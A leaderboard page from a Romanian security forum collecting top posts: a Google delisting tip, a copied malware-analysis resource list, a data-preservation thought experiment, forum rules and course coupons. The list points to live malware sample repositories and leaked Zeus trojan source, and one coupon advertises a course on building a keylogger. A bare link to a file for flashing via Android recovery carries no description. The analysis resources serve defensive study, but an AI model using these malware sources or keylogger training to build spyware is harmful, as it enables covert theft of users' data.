Leaderboard
Popular Content
Showing content with the highest reputation on 11/20/16 in all areas
-
In cazul in care doreste cineva sa ramana cat mai anonim (sa stearga mai toate datele cu caracter personal pe care le gasesti usor prin Google), acest link va poate ajuta: https://support.google.com/legal/contact/lr_eudpa?product=websearch&hl=ro Aici puteti face o cerere catre Google pentru a sterge link-urile nedorite din cautarile Google daca se cauta numele vostru si sunt gasite prea multe date personale, spre exemplu (puteti pune oricate link-uri care ofera prea multe date cu caracter personal la cautarea pe Google). Exemplu: In cazul meu am pornit de la emailul personal, si am gasit si telefonul personal, ce proiect de practica am avut, ce note am luat la facultate la proiectul de practica respectiv, cand am facut facultatea, cand am facut practica, ce cont de student am avut la facultate, aproape ca puteam ghici de pe Google si ce grupa eram (colegii de facultate oricum ii gasisem cu toate informatiile si pe ei). Daca cineva afla prea multe informatii despre tine poate chiar sa obtina acces la contul de mail (depinde de cat de mult ai tinut la securizarea email-ului sau conturilor respective, dar oricum ai atatea informatii de pe Google). Stiu ca aceasta decizie legata de datele personale si motoarele de cautare e din 2014, dar nu am gasit pe forum nimic de genul ( am cautat link-ul, cuvinte cheie, etc). Cu asta puteti face curat, sa ramaneti cat mai anonimi, sa nu se faca prea multe legaturi intre conturi si date personale confidentiale care ajuta la accesarea conturilor! Edit: Rog un moderator sa mute threadul daca gaseste un loc mai potrivit in care sa fie postat. Eu am postat aici deoarece e cel mai apropiat de tema SEO (cu motoare de cautare).6 points
-
A curated list of awesome malware analysis tools and resources. Inspired by awesome-python and awesome-php. Awesome Malware Analysis Malware Collection Anonymizers Honeypots Malware Corpora Open Source Threat Intelligence Tools Other Resources Detection and Classification Online Scanners and Sandboxes Domain Analysis Browser Malware Documents and Shellcode File Carving Deobfuscation Debugging and Reverse Engineering Network Memory Forensics Windows Artifacts Storage and Workflow Miscellaneous Resources Books Twitter Other Related Awesome Lists Contributing Thanks Malware Collection Anonymizers Web traffic anonymizers for analysts. Anonymouse.org - A free, web based anonymizer. OpenVPN - VPN software and hosting solutions. Privoxy - An open source proxy server with some privacy features. Tor - The Onion Router, for browsing the web without leaving traces of the client IP. Honeypots Trap and collect your own samples. Conpot - ICS/SCADA honeypot. Cowrie - SSH honeypot, based on Kippo. Dionaea - Honeypot designed to trap malware. Glastopf - Web application honeypot. Honeyd - Create a virtual honeynet. HoneyDrive - Honeypot bundle Linux distro. Mnemosyne - A normalizer for honeypot data; supports Dionaea. Thug - Low interaction honeyclient, for investigating malicious websites. Malware Corpora Malware samples collected for analysis. Clean MX - Realtime database of malware and malicious domains. Contagio - A collection of recent malware samples and analyses. Exploit Database - Exploit and shellcode samples. Malshare - Large repository of malware actively scrapped from malicious sites. samples directly from a number of online sources. MalwareDB - Malware samples repository. Open Malware Project - Sample information and downloads. Formerly Offensive Computing. Ragpicker - Plugin based malware crawler with pre-analysis and reporting functionalities theZoo - Live malware samples for analysts. ViruSign - Malware database that detected by many anti malware programs except ClamAV. VirusShare - Malware repository, registration required. Zeltser's Sources - A list of malware sample sources put together by Lenny Zeltser. Zeus Source Code - Source for the Zeus trojan leaked in 2011. Open Source Threat Intelligence Tools Harvest and analyze IOCs. AbuseHelper - An open-source framework for receiving and redistributing abuse feeds and threat intel. AlienVault Open Threat Exchange - Share and collaborate in developing Threat Intelligence. Combine - Tool to gather Threat Intelligence indicators from publicly available sources. Fileintel - Pull intelligence per file hash. Hostintel - Pull intelligence per host. IntelMQ - A tool for CERTs for processing incident data using a message queue. IOC Editor - A free editor for XML IOC files. ioc_writer - Python library for working with OpenIOC objects, from Mandiant. Massive Octo Spice - Previously known as CIF (Collective Intelligence Framework). Aggregates IOCs from various lists. Curated by the CSIRT Gadgets Foundation. MISP - Malware Information Sharing Platform curated by The MISP Project. PassiveTotal - Research, connect, tag and share IPs and domains. PyIOCe - A Python OpenIOC editor. threataggregator - Aggregates security threats from a number of sources, including some of those listed below in other resources. ThreatCrowd - A search engine for threats, with graphical visualization. ThreatTracker - A Python script to monitor and generate alerts based on IOCs indexed by a set of Google Custom Search Engines. TIQ-test - Data visualization and statistical analysis of Threat Intelligence feeds. Other Resources Threat intelligence and IOC resources. Autoshun (list) - Snort plugin and blocklist. Bambenek Consulting Feeds - OSINT feeds based on malicious DGA algorithms. Fidelis Barncat - Extensive malware config database (must request access). CI Army (list) - Network security blocklists. Critical Stack- Free Intel Market - Free intel aggregator with deduplication featuring 90+ feeds and over 1.2M indicators. CRDF ThreatCenter - List of new threats detected by CRDF anti-malware. FireEye IOCs - Indicators of Compromise shared publicly by FireEye. FireHOL IP Lists - Analytics for 350+ IP lists with a focus on attacks, malware and abuse. Evolution, Changes History, Country Maps, Age of IPs listed, Retention Policy, Overlaps. hpfeeds - Honeypot feed protocol. Internet Storm Center (DShield) - Diary and searchable incident database, with a web API (unofficial Python library). malc0de - Searchable incident database. Malware Domain List - Search and share malicious URLs. OpenIOC - Framework for sharing threat intelligence. Palevo Blocklists - Botnet C&C blocklists. Proofpoint Threat Intelligence - Rulesets and more. (Formerly Emerging Threats.) STIX - Structured Threat Information eXpression - Standardized language to represent and share cyber threat information. Related efforts from MITRE: CAPEC - Common Attack Pattern Enumeration and Classification CybOX - Cyber Observables eXpression MAEC - Malware Attribute Enumeration and Characterization TAXII - Trusted Automated eXchange of Indicator Information threatRECON - Search for indicators, up to 1000 free per month. Yara rules - Yara rules repository. ZeuS Tracker - ZeuS blocklists. Detection and Classification Antivirus and other malware identification tools AnalyzePE - Wrapper for a variety of tools for reporting on Windows PE files. chkrootkit - Local Linux rootkit detection. ClamAV - Open source antivirus engine. Detect-It-Easy - A program for determining types of files. ExifTool - Read, write and edit file metadata. hashdeep - Compute digest hashes with a variety of algorithms. Loki - Host based scanner for IOCs. Malfunction - Catalog and compare malware at a function level. MASTIFF - Static analysis framework. MultiScanner - Modular file scanning/analysis framework nsrllookup - A tool for looking up hashes in NIST's National Software Reference Library database. packerid - A cross-platform Python alternative to PEiD. PEV - A multiplatform toolkit to work with PE files, providing feature-rich tools for proper analysis of suspicious binaries. Rootkit Hunter - Detect Linux rootkits. ssdeep - Compute fuzzy hashes. totalhash.py - Python script for easy searching of the TotalHash.cymru.com database. TrID - File identifier. YARA - Pattern matching tool for analysts. Yara rules generator - Generate yara rules based on a set of malware samples. Also contains a good strings DB to avoid false positives. Online Scanners and Sandboxes Web-based multi-AV scanners, and malware sandboxes for automated analysis. APK Analyzer - Free dynamic analysis of APKs. AndroTotal - Free online analysis of APKs against multiple mobile antivirus apps. AVCaesar - Malware.lu online scanner and malware repository. Cryptam - Analyze suspicious office documents. Cuckoo Sandbox - Open source, self hosted sandbox and automated analysis system. cuckoo-modified - Modified version of Cuckoo Sandbox released under the GPL. Not merged upstream due to legal concerns by the author. cuckoo-modified-api - A Python API used to control a cuckoo-modified sandbox. DeepViz - Multi-format file analyzer with machine-learning classification. detux - A sandbox developed to do traffic analysis of Linux malwares and capturing IOCs. Document Analyzer - Free dynamic analysis of DOC and PDF files. DRAKVUF - Dynamic malware analysis system. File Analyzer - Free dynamic analysis of PE files. firmware.re - Unpacks, scans and analyzes almost any firmware package. Hybrid Analysis - Online malware analysis tool, powered by VxSandbox. IRMA - An asynchronous and customizable analysis platform for suspicious files. Joe Sandbox - Deep malware analysis with Joe Sandbox. Jotti - Free online multi-AV scanner. Limon - Sandbox for Analyzing Linux Malwares Malheur - Automatic sandboxed analysis of malware behavior. Malwr - Free analysis with an online Cuckoo Sandbox instance. MASTIFF Online - Online static analysis of malware. Metadefender.com - Scan a file, hash or IP address for malware (free) NetworkTotal - A service that analyzes pcap files and facilitates the quick detection of viruses, worms, trojans, and all kinds of malware using Suricata configured with EmergingThreats Pro. Noriben - Uses Sysinternals Procmon to collect information about malware in a sandboxed environment. PDF Examiner - Analyse suspicious PDF files. ProcDot - A graphical malware analysis tool kit. Recomposer - A helper script for safely uploading binaries to sandbox sites. SEE - Sandboxed Execution Environment (SEE) is a framework for building test automation in secured Environments. URL Analyzer - Free dynamic analysis of URL files. VirusTotal - Free online analysis of malware samples and URLs Visualize_Logs - Open source visualization library and command line tools for logs. (Cuckoo, Procmon, more to come...) Zeltser's List - Free automated sandboxes and services, compiled by Lenny Zeltser. Domain Analysis Inspect domains and IP addresses. Desenmascara.me - One click tool to retrieve as much metadata as possible for a website and to assess its good standing. Dig - Free online dig and other network tools. dnstwist - Domain name permutation engine for detecting typo squatting, phishing and corporate espionage. IPinfo - Gather information about an IP or domain by searching online resources. Machinae - OSINT tool for gathering information about URLs, IPs, or hashes. Similar to Automator. mailchecker - Cross-language temporary email detection library. MaltegoVT - Maltego transform for the VirusTotal API. Allows domain/IP research, and searching for file hashes and scan reports. SenderBase - Search for IP, domain or network owner. SpamCop - IP based spam block list. SpamHaus - Block list based on domains and IPs. Sucuri SiteCheck - Free Website Malware and Security Scanner. TekDefense Automater - OSINT tool for gathering information about URLs, IPs, or hashes. URLQuery - Free URL Scanner. Whois - DomainTools free online whois search. Zeltser's List - Free online tools for researching malicious websites, compiled by Lenny Zeltser. ZScalar Zulu - Zulu URL Risk Analyzer. Browser Malware Analyze malicious URLs. See also the domain analysis and documents and shellcode sections. Firebug - Firefox extension for web development. Java Decompiler - Decompile and inspect Java apps. Java IDX Parser - Parses Java IDX cache files. JSDetox - JavaScript malware analysis tool. jsunpack-n - A javascript unpacker that emulates browser functionality. Krakatau - Java decompiler, assembler, and disassembler. Malzilla - Analyze malicious web pages. RABCDAsm - A "Robust ActionScript Bytecode Disassembler." swftools - Tools for working with Adobe Flash files. xxxswf - A Python script for analyzing Flash files. Documents and Shellcode Analyze malicious JS and shellcode from PDFs and Office documents. See also the browser malware section. AnalyzePDF - A tool for analyzing PDFs and attempting to determine whether they are malicious. box-js - A tool for studying JavaScript malware, featuring JScript/WScript support and ActiveX emulation. diStorm - Disassembler for analyzing malicious shellcode. JS Beautifier - JavaScript unpacking and deobfuscation. JS Deobfuscator - Deobfuscate simple Javascript that use eval or document.write to conceal its code. libemu - Library and tools for x86 shellcode emulation. malpdfobj - Deconstruct malicious PDFs into a JSON representation. OfficeMalScanner - Scan for malicious traces in MS Office documents. olevba - A script for parsing OLE and OpenXML documents and extracting useful information. Origami PDF - A tool for analyzing malicious PDFs, and more. PDF Tools - pdfid, pdf-parser, and more from Didier Stevens. PDF X-Ray Lite - A PDF analysis tool, the backend-free version of PDF X-RAY. peepdf - Python tool for exploring possibly malicious PDFs. QuickSand - QuickSand is a compact C framework to analyze suspected malware documents to identify exploits in streams of different encodings and to locate and extract embedded executables. Spidermonkey - Mozilla's JavaScript engine, for debugging malicious JS. File Carving For extracting files from inside disk and memory images. bulk_extractor - Fast file carving tool. EVTXtract - Carve Windows Event Log files from raw binary data. Foremost - File carving tool designed by the US Air Force. Hachoir - A collection of Python libraries for dealing with binary files. Scalpel - Another data carving tool. Deobfuscation Reverse XOR and other code obfuscation methods. Balbuzard - A malware analysis tool for reversing obfuscation (XOR, ROL, etc) and more. de4dot - .NET deobfuscator and unpacker. ex_pe_xor & iheartxor - Two tools from Alexander Hanel for working with single-byte XOR encoded files. FLOSS - The FireEye Labs Obfuscated String Solver uses advanced static analysis techniques to automatically deobfuscate strings from malware binaries. NoMoreXOR - Guess a 256 byte XOR key using frequency analysis. PackerAttacker - A generic hidden code extractor for Windows malware. unpacker - Automated malware unpacker for Windows malware based on WinAppDbg. unxor - Guess XOR keys using known-plaintext attacks. VirtualDeobfuscator - Reverse engineering tool for virtualization wrappers. XORBruteForcer - A Python script for brute forcing single-byte XOR keys. XORSearch & XORStrings - A couple programs from Didier Stevens for finding XORed data. xortool - Guess XOR key length, as well as the key itself. Debugging and Reverse Engineering Disassemblers, debuggers, and other static and dynamic analysis tools. angr - Platform-agnostic binary analysis framework developed at UCSB's Seclab. bamfdetect - Identifies and extracts information from bots and other malware. BAP - Multiplatform and open source (MIT) binary analysis framework developed at CMU's Cylab. BARF - Multiplatform, open source Binary Analysis and Reverse engineering Framework. binnavi - Binary analysis IDE for reverse engineering based on graph visualization. Binwalk - Firmware analysis tool. Bokken - GUI for Pyew and Radare. (mirror) Capstone - Disassembly framework for binary analysis and reversing, with support for many architectures and bindings in several languages. codebro - Web based code browser using clang to provide basic code analysis. dnSpy - .NET assembly editor, decompiler and debugger. Evan's Debugger (EDB) - A modular debugger with a Qt GUI. Fibratus - Tool for exploration and tracing of the Windows kernel. FPort - Reports open TCP/IP and UDP ports in a live system and maps them to the owning application. GDB - The GNU debugger. GEF - GDB Enhanced Features, for exploiters and reverse engineers. hackers-grep - A utility to search for strings in PE executables including imports, exports, and debug symbols. IDA Pro - Windows disassembler and debugger, with a free evaluation version. Immunity Debugger - Debugger for malware analysis and more, with a Python API. ltrace - Dynamic analysis for Linux executables. objdump - Part of GNU binutils, for static analysis of Linux binaries. OllyDbg - An assembly-level debugger for Windows executables. PANDA - Platform for Architecture-Neutral Dynamic Analysis PEDA - Python Exploit Development Assistance for GDB, an enhanced display with added commands. pestudio - Perform static analysis of Windows executables. plasma - Interactive disassembler for x86/ARM/MIPS. PPEE (puppy) - A Professional PE file Explorer for reversers, malware researchers and those who want to statically inspect PE files in more detail. Process Explorer - Advanced task manager for Windows. Process Monitor - Advanced monitoring tool for Windows programs. PSTools - Windows command-line tools that help manage and investigate live systems. Pyew - Python tool for malware analysis. Radare2 - Reverse engineering framework, with debugger support. RetDec - Retargetable machine-code decompiler with an online decompilation service and API that you can use in your tools. ROPMEMU - A framework to analyze, dissect and decompile complex code-reuse attacks. SMRT - Sublime Malware Research Tool, a plugin for Sublime 3 to aid with malware analyis. strace - Dynamic analysis for Linux executables. Triton - A dynamic binary analysis (DBA) framework. Udis86 - Disassembler library and tool for x86 and x86_64. Vivisect - Python tool for malware analysis. X64dbg - An open-source x64/x32 debugger for windows. Network Analyze network interactions. Bro - Protocol analyzer that operates at incredible scale; both file and network protocols. BroYara - Use Yara rules from Bro. CapTipper - Malicious HTTP traffic explorer. chopshop - Protocol analysis and decoding framework. Fiddler - Intercepting web proxy designed for "web debugging." Hale - Botnet C&C monitor. Haka - An open source security oriented language for describing protocols and applying security policies on (live) captured traffic. INetSim - Network service emulation, useful when building a malware lab. Laika BOSS - Laika BOSS is a file-centric malware analysis and intrusion detection system. Malcom - Malware Communications Analyzer. Maltrail - A malicious traffic detection system, utilizing publicly available (black)lists containing malicious and/or generally suspicious trails and featuring an reporting and analysis interface. mitmproxy - Intercept network traffic on the fly. Moloch - IPv4 traffic capturing, indexing and database system. NetworkMiner - Network forensic analysis tool, with a free version. ngrep - Search through network traffic like grep. PcapViz - Network topology and traffic visualizer. Tcpdump - Collect network traffic. tcpick - Trach and reassemble TCP streams from network traffic. tcpxtract - Extract files from network traffic. Wireshark - The network traffic analysis tool. Memory Forensics Tools for dissecting malware in memory images or running systems. BlackLight - Windows/MacOS forensics client supporting hiberfil, pagefile, raw memory analysis DAMM - Differential Analysis of Malware in Memory, built on Volatility evolve - Web interface for the Volatility Memory Forensics Framework. FindAES - Find AES encryption keys in memory. Muninn - A script to automate portions of analysis using Volatility, and create a readable report. Rekall - Memory analysis framework, forked from Volatility in 2013. TotalRecall - Script based on Volatility for automating various malware analysis tasks. VolDiff - Run Volatility on memory images before and after malware execution, and report changes. Volatility - Advanced memory forensics framework. VolUtility - Web Interface for Volatility Memory Analysis framework. WinDbg - Live memory inspection and kernel debugging for Windows systems. Windows Artifacts AChoir - A live incident response script for gathering Windows artifacts. python-evt - Python library for parsing Windows Event Logs. python-registry - Python library for parsing registry files. RegRipper (GitHub) - Plugin-based registry analysis tool. Storage and Workflow Aleph - OpenSource Malware Analysis Pipeline System. CRITs - Collaborative Research Into Threats, a malware and threat repository. Malwarehouse - Store, tag, and search malware. Polichombr - A malware analysis platform designed to help analysts to reverse malwares collaboratively. Viper - A binary management and analysis framework for analysts and researchers. Miscellaneous al-khaser - A PoC malware with good intentions that aimes to stress anti-malware systems. Binarly - Search engine for bytes in a large corpus of malware. DC3-MWCP - The Defense Cyber Crime Center's Malware Configuration Parser framework. MalSploitBase - A database containing exploits used by malware. Pafish - Paranoid Fish, a demonstration tool that employs several techniques to detect sandboxes and analysis environments in the same way as malware families do. REMnux - Linux distribution and docker images for malware reverse engineering and analysis. Santoku Linux - Linux distribution for mobile forensics, malware analysis, and security. Resources Books Essential malware analysis reading material. Malware Analyst's Cookbook and DVD - Tools and Techniques for Fighting Malicious Code. Practical Malware Analysis - The Hands-On Guide to Dissecting Malicious Software. Real Digital Forensics - Computer Security and Incident Response The Art of Memory Forensics - Detecting Malware and Threats in Windows, Linux, and Mac Memory. The IDA Pro Book - The Unofficial Guide to the World's Most Popular Disassembler. The Rootkit Arsenal - The Rootkit Arsenal: Escape and Evasion in the Dark Corners of the System Twitter Some relevant Twitter accounts. Adamb @Hexacorn Andrew Case @attrc Binni Shah @binitamshah Claudio @botherder Dustin Webber @mephux Glenn @hiddenillusion jekil @jekil Jurriaan Bremer @skier_t Lenny Zeltser @lennyzeltser Liam Randall @hectaman Mark Schloesser @repmovsb Michael Ligh (MHL) @iMHLv2 Monnappa @monnappa22 Open Malware @OpenMalware Richard Bejtlich @taosecurity Volatility @volatility Other APT Notes - A collection of papers and notes related to Advanced Persistent Threats. File Formats posters - Nice visualization of commonly used file format (including PE & ELF). Honeynet Project - Honeypot tools, papers, and other resources. Kernel Mode - An active community devoted to malware analysis and kernel development. Malicious Software - Malware blog and resources by Lenny Zeltser. Malware Analysis Search - Custom Google search engine from Corey Harrell. Malware Analysis Tutorials - The Malware Analysis Tutorials by Dr. Xiang Fu, a great resource for learning practical malware analysis. Malware Samples and Traffic - This blog focuses on network traffic related to malware infections. Practical Malware Analysis Starter Kit - This package contains most of the software referenced in the Practical Malware Analysis book. RPISEC Malware Analysis - These are the course materials used in the Malware Analysis course at at Rensselaer Polytechnic Institute during Fall 2015. WindowsIR: Malware - Harlan Carvey's page on Malware. Windows Registry specification - Windows registry file format specification. /r/csirt_tools - Subreddit for CSIRT tools and resources, with a malware analysis flair. /r/Malware - The malware subreddit. /r/ReverseEngineering - Reverse engineering subreddit, not limited to just malware. Related Awesome Lists Android Security AppSec CTFs "Hacking" Honeypots Industrial Control System Security Incident-Response Infosec PCAP Tools Pentesting Security Threat Intelligence Sursa: https://github.com/rshipp/awesome-malware-analysis/4 points
-
Problema nu e pe ce pastrati informatia, ci cu ce o veti citi peste 10000 ani.2 points
-
2 points
-
Cum spune si titlul, cei de la Packt ofera in fiecare zi aproape carti gratis de pe siteul lor. Tot ce trebuie sa faci este sa te inregistrezi. Site-ul respectiv se afla aici: https://www.packtpub.com/packt/offers/free-learning Edit: Aparent au schimbat lucrurile baietii..1 point
-
[RO] Termeni si conditii - Administratorii acestui website nu isi asuma nicio responsabilitate pentru continutul acestui forum! Fiecare utilizator este responsabil pentru continutul creat! - Administratorii nu sunt responsabili pentru problemele aparute in urma folosirii informatiilor de pe acest website! - Administratorii acestui website nu isi asuma nicio responsabilitate pentru pagubele rezultate in urma vanzarii, cumpararii sau schimbului de bunuri sau servicii pe acest website! - Avem toleranta 0 pentru frauda sau informatii care faciliteaza frauda online sau bancara, inclusiv prin mesajele private (skimming, CC-uri, root-uri etc.). Orice abatere de la aceasta regula se pedepseste prin interzicerea permanenta pe website, iar datele voastre vor fi oferite organelor competente dac? ni se va cere acest lucru. De asemenea, administratorii isi rezerva dreptul de a interzice utilizatorilor accesul pe website in urma oricarei posibile activitati care pot fi legate de frauda online sau bancara. - Se interzice publicarea de continut ilegal sau fara drepturi de autor! Este interzisa publicarea de date cu caracter personal, conturi care nu va apartin, informatii de acces la diferite servere sau website-uri sau orice altceva care nu va apartine si care nu respecta legislatia in vigoare! - Acest website nu gazduieste fisiere fara drepturi de autor ci doar legaturi catre diferite servicii externe. Administratorii acestui website nu isi asuma responsabilitatea pentru continutul prezent pe servicii externe. Daca sunteti posesorii drepturilor de autor pentru informatii publicate pe acest website, luati legatura cu unul dintre administratori pentru eliminarea continutului. - Prin accesarea acestui website sunteti de acord cu termenii si conditiile si cu regulamentul acestui website! [RO] Avertisemente, interzicere temporara sau permanenta In urma abaterii de la regulile acestui forum, utilizatorii pot fi avertizati (warn) sau li se poate interzice accesul pe forum (ban) temporar sau permanent. Administratorii si moderatorii acestui website sunt cei care decid pedeapsele pentru incalcarea regulilor. Daca considerati ca pedeapsa (warn sau ban) nu este justificata, luati legatura cu unul dintre administratorii acestui website. Actiuni pentru care veti primi un avertisment (warn): - Off-topic - Daca va abateti de la tema de discutie a unui subiect - Post dublu - Nu faceti mai multe posturi consecutive - Post inutil - Nu potati doar de dragul de a posta ci doar daca aveti ceva util de spus - Redeschidere topic - Verificati daca ultimului post intr-un topic, daca nu s-a mai postat de cativa ani nu postati nici voi - Insultare membru - Fara atacuri la persoana sau injuraturi - Nume inadecvat - Pentru un topic, alegeti un titlu care sa rezume postul - Limbaj inadecvat - Respectati regulile gramaticale, fara sh, tz sau altceva, nu sunteti pe IRC - Link-uri cu referral - Fara adf.ly sau alte mizerii - Crearea unui cont pe forum doar pentru a cere invitatii pe trackere, alte forumuri, etc. - Altul: orice abatere care nu se incadreaza in aceste categorii Pentru multiple avertismente rezultatul poate fi banarea temporara sau permanenta, astfel: - pentru 3 avertismente - ban 5 zile - pentru 4 avertismente - ban 30 de zile - pentru 5 avertismente - ban permanent [RO] Reguli 1. Nu postati si nu cereti root-uri, vpn-uri, smtp-uri etc. 2. Oferiti credite si dati sursele originale. Daca veti copia un link sau un tutorial de pe alt site/forum/blog, oferiti credite autorului initial. 3. Unele categorii (ca Free Stuff sau RST Market) au regulament intern. Verifica daca exista un regulament sticky inainte de a posta intr-o anumita categorie. 4. Fiecare tutorial, program sau lucruri asemanatoare trebuie insotite de o descriere in romana sau engleza. Linkurile catre programe trebuie sa fie catre site-ul oficial al acelui program sau tutorial. 5. Publicarea datelor personale sau tentative de acest gen ale oricarui individ duce la ban permanent. 6. Nu cereti VIP, Moderator sau alte ranguri pentru ca nu le veti primi. Daca vom avea nevoie va vom cauta noi. 7. Un moderator/administrator are dreptul sa zboare pe oricine doreste de pe forum, cu atat mai mult daca consider? ca acea persoan? este inutila pentru forum. 8. Exista buton de report post. Nu atrageti aten?ia prin mesaje publice pentru ca veti primi avertisment. Eventual dati mesaj privat acelui utilizator. 9. Nu aveti voie sa faceti proiecte sau prezentari in numele RST fara acordul unuia dintre administratori. 10. Nu aveti voie sa injurati pe chat sau sa faceti atacuri la persoana. Nerespectarea acestei reguli duce la sanctionarea prin Kick si ulterior prin BAN pe chat. 11. Crearea a mai mult de 1 cont pe persoana duce automat la banarea tuturor conturilor. 12. Postarea de vulnerabilitati in site-uri care nu au un program bug-bounty si care nu ofera un cadru legal pentru raportarea vulnerabilitatilor este interzisa. Administratorii RST au dreptul de a modifica oricand Termenii si conditiile si Regulamentul acestui website fara o notificare in prealabil. [RO] Regulament categorii: Free stuff - Nu se accepta root-uri, smtp-uri, vps-uri, rdp-uri etc. care nu va apartin - Nu se accepta conturi sau acces la diferite servicii care nu va apartin RST Market - Nu se accepta vanzarea, cumpararea sau schimbul de date care faciliteteaza frauda online sau bancara - Nu se accepta vanzarea, cumpararea sau schimbul de root-uri, smtp-uri, vps-uri, rdp-uri etc. care nu va apartin - Nu se accepta vanzarea, cumpararea sau schimbul de conturi care nu va apartin [EN] Terms and conditions - The administrators of this website do not take any responsibility for the content of the website! Each user is responsible for the created content! - The administrators are not responsible on any problem resulted by using the information available on this website! - The administrators of this website do not take any responsibility for the loss resulted by selling, buying or exchanging information on this website! - We do no tolerate fraud or any information that facilitates online fraud or banking fraud, including by private messaging system (skimming, CCs, roots etc.)! Any abuse on this rule is punished with permanent ban on this website and your personal data will be offered to the authorities if they request us this. Also, the administrators of this forum are allowed to ban users for any activity that can be related to online fraud or banking fraud. - It is not permitted to create illegal content or without copyright! It is forbidden to publish private personal date, stolen accounts, access information to different websites or services that do not belong to you or any information that does not respect the legislation! - This website does not host files without copyright, it only hosts links to external service providers. The administrators of this website do not take the responsibility for the content available on external services. If you are the copyright folder for information provided on the website, please contact one of the administrators to remove the content. - By accessing this website you agree the terms and conditions and the rules of this website! [EN] Warnings, temporary and permanent ban reasons Not following the forum rules may result in warnings, temporary ban or permanent ban on this website. The administrators and the moderators of this website decide the punishment for each abuse of the rules. If you consider that the punishment is not correct, please contact one of the administrators of this website. You can be warned for the following actions: - Off-topic - if you deviate from the topic subject - Double post - If you have multiple consecutive posts - Useless post - If you post without any reason and the post is not useful to the topic subject - Reopen thread - Check the last post date on a thread and do not post there if it is very old - Insulted member - Do not attack and insult other members - Improper name - Please use descriptive thread subjects - Improper language - You are not on IRC, please be as correctly grammatical as possible - Referral links - Do not post adf.ly or other stupid referral links - Creating an account on the forum only to ask for invitations on trackers, other forums, etc. - Other - Any other abuse of the forum rules For multiple warnings, the result can be temporary or permanent ban: - for 3 warnings - ban 5 days - for 4 warnings - ban 30 days - for 5 warnings - permanent ban [EN] Rules 1. Do not post or request root, vps, smtp or anything else. 2. Specify the original sources for your posts when you post a tool or a tutorial from other website. 3. Some categories (such as Free stuff or RST Market) have internal rules. Follow that rules when you post in that categories. 4. Each tool or tutorial must contain at least a small description in English or Romanian. Links to programs must be links to the official site of those programs. 5. Publishing or trying to publish private personal information will result in permanent ban. 6. Do not request VIP or Moderator access, you will not get it. If we need you, we will search you. 7. A moderator or an administrator have the right to ban anyone on this forum if he considers that the user is useless for the forum. 8. There is a "Report" button, please use it, do not post to warn other users about their mistake. 9. You are not allowed to create tools or write articles in the name of RST without the approval of one of the administrators. 10. You are not allowed to attack or insult other persons on that chat and on the forum. 11. If you have more than one account you can be banned on all your accounts. 12. Posting vulnerabilities i websites that do not have a bug bounty program is forbidden. RST staff have the right to modify at any time the Terms and conditions and the rules of this forum without a notification. [EN] Category rules Free stuff: - It is forbidden to post or request root, vps, smtp or anything else that do not belong to you - It is forbidden to post accounts for different websites or services that do not belong to you RST Market: - It is forbidden to sell, buy or exchange data that facilitates online fraud or banking fraud - It is forbidden to sell, buy or exchange roots, vps, smtp, rdp or anything else that do not belong to you - It is forbidden to sell, buy or exchange accounts that do not belong to you1 point
-
Salut , din lipsa ocupatiei tot ma gandesc la anumite scenari , ceva ipotetic , sa presupunem ca o super furtuna solara loveste pamantul , spre deosebire de 1859 , cand ultima mare furtuna a avut loc , telegraful find singurul aparat electronic afectat , in lumea moderna totul depinde de electricitate , sansele sa fim loviti direct de catre o furtuna sunt destul de mici dar nu inexistente , omenirea posibil fiind trimisa inapoi in "epoca de piatra" . Scenariul. Pastrarea datelor . In lumea moderna , nu foarte multe persoane mai folosesc date "fizice" , majoritatea informatiilor sunt digitale , si aici vreau sa deschid un subiect anume , este vorba de amintirile noastre , "mostenirea tehnologica". Eu personal nu detin foarte multe poze/date fizice , majoritatea se afla pe camera digitala , in telefon , sau in HDD/SSD-ul Pc-ului Ce metoda credeti ca este mai eficienta in a pastra datele ? , sperand ca omenirea va rezolva problema electricitatii intr-o peridoada de timp nedeterminata , de asemenea , capacitatea de stocare , durabilitatea in timp , viteza de transfer a datelor , si nu in ultimul rand accesibilitatea , sunt factori importanti in a decide un castigator. 1. USB (flash) 2. DVD 3. HDD 4. SSD 5.Floppy 6.CD 7.SD Cards 8.Zip disk 9. Storage tape 10. Blu-Ray 11 etc "Puteti da alte exemple." A.Q 1. "Pozele" sunt doar un exemplu , pot fi si clipuri video , audio , carti pdf , date despre planeta , cercetari stintifice, etc. 2. In urma intamplarilor relatate , guvernele nu au putut sa mentina ordinea , asta a izbugnit un razboi civil , majoritatea guverneleor au disparut. 3. Majoritatea electronicelor ramase intacte in urma furtunilor solare , sunt folosite ca "Lemne de foc" de catre populatie , asta se aplica si pentru carti,lucrari de arta,documente. 4. Si in final , populatia este dezinformata , foarte putini stiu cauza reala a catastrofei , guvernele considerand ca informarea populatiei despre evenimentele ce vor urma pot produce un haos mai mare. Misiunea ta este simpla , esti unul dintre cei "norocosi", si afli cu 1 saptamana inainte de catastrofa , iar obiectivul tau este sa pastrezi cat mai multe date importante , care in viitor ne vor ajuta sa ne ridicam din nou civilizatia , singura problema fiind , timpul.1 point
-
https://mega.nz/#!2Awy3QhY!52psqiH1mX8jb-cH-8oDmb4P8pLDkzWUYTR4jwOze6o Se da cu SDCARD in recovery, "apply update from storage / sdcard" Succes!1 point
-
Build an Advanced Keylogger using C++ for Ethical Hacking! https://www.udemy.com/how-to-create-an-advanced-keylogger-from-scratch-for-windows/?couponCode=PROMOCOUPONS24 Learn and Understand C++ https://www.udemy.com/learn-c-plus-plus-from-beginner-to-advanced/?couponCode=PROMOCOUPONS24 Learn Angular 2 from Beginner to Advanced https://www.udemy.com/learn-angular-2-from-beginner-to-advanced/?couponCode=PROMOCOUPONS241 point
-
OFF: - Ai dreptate , pot face ceva mai productiv , tocmai de-aia este ceva ipotetic , pot sa-i spun o curiozitate nimic mai mult . - Cred ca scenariul meu este probabil, nu l-as numi "fantasy" , pentru ca deja s-a intamplat acum 150 ani , si cu siguranta se va mai intampla in viitor , desigur ca nimeni nu poate spune cand , 10 , 100 , 1000 ani , etc , aici nu vorbim de "Invazii extraterestre" sau "Godzila". ON: - Desigur , ai mare dreptate , am uitat sa precizez , informatiile salvate sunt din motivatia proprie , pur si simplu , este vorba de o persoana normala , care incearca sa-si salveze anumite date , desigur ca guvernele au tot felul de protocoale de convervare a speciei si a informatiilor , unele la care majoritatea viseaza , specia umana este ca un virus pentru planeta , degeaba ne trateaza , pentru ca radacinile vor ramane mereu.1 point
-
